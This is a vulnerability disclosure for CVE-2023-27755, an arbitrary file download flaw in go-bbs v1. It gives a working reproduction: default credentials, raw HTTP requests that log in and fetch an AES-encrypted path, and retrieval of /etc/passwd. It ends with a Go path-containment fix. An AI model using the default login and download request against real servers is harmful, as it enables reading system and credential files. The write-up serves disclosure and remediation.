CVE-2023-27755: go-bbs has an arbitrary file download vulnerability · Issue #10 · gobbscom/go-bbs
go-bbs v1 was discovered to contain an arbitrary file download vulnerability via the component /api/v1/download.
Install
- Download: git clone https://github.com/gobbscom/go-bbs.git
- Create a directory: cd go-bbs && mkdir conf
- Copy the configuration file: cp app.conf.example conf/app.conf
- Modify the database configuration
- Execute ./go-bbs --install to initialise the database.
- Finally, execute ./go-bbs and open the port it listens on.
Vulnerability Description and Reproduction
Look at the route definitions in routers/router.go at line 196.
Follow the Download method of &home.SingleController{}. This endpoint requires a logged-in session, and a global search for Customer shows that a user is added by default:
UserName: User
PassWord: 123456
Back in router.go, follow &home.LoginController{} and log in by posting the username and password:
POST /login.html HTTP/1.1
Host: 192.168.19.6:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
username=user&password=123456
Credentials obtained: beegosessionID=***
The path segment of the incoming URL is passed through AesDecrypt, so the path you want to download must first be encrypted with AesEncrypt:
GET /api/v1/download/1dClk+Blwbf5B9SEDK+l58R84WE7XKXawdq51GCypQo= HTTP/1.1
Host: 192.168.19.6:9090
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Cookie: beegosessionID=6bf662559825c07495e9e8a1e7380180
Connection: close
Calling the download API with the session cookie returns the contents of /etc/passwd.
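The root cause described above is that the decrypted path is trusted as soon as it decrypts: the ciphertext proves nothing about where the file lives. The containment check below is an added example, not code from go-bbs; the handler shape, the base directory and the function name resolveDownloadPath are assumptions.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ErrOutsideBase is returned when a decrypted download path escapes the
// configured download root.
var ErrOutsideBase = errors.New("requested path is outside the download root")

// resolveDownloadPath is a hypothetical hardened step for the Download handler:
// it takes the AES-decrypted value as untrusted input and only returns a path
// that lies strictly inside baseDir. Absolute paths, "../" traversal and an
// empty value are all rejected rather than rewritten.
func resolveDownloadPath(baseDir, decrypted string) (string, error) {
	if decrypted == "" || filepath.IsAbs(decrypted) || strings.ContainsRune(decrypted, 0) {
		return "", ErrOutsideBase
	}
	root, err := filepath.Abs(baseDir)
	if err != nil {
		return "", err
	}
	// Join then Clean so that ".." segments are resolved before the check.
	full := filepath.Clean(filepath.Join(root, decrypted))
	rel, err := filepath.Rel(root, full)
	if err != nil || rel == "." || rel == ".." ||
		strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrOutsideBase
	}
	return full, nil
}

func main() {
	// Constructed sample inputs: what a decrypted path segment might hold.
	for _, p := range []string{"files/report.pdf", "files/../other.txt", "../../etc/passwd", "/etc/passwd"} {
		got, err := resolveDownloadPath("/srv/uploads", p)
		fmt.Printf("%-20q -> %q, err=%v\n", p, got, err)
	}
}
```

The check does not follow symlinks inside the root (filepath.EvalSymlinks would be needed for that), so the download directory itself must also be kept free of links pointing outside it.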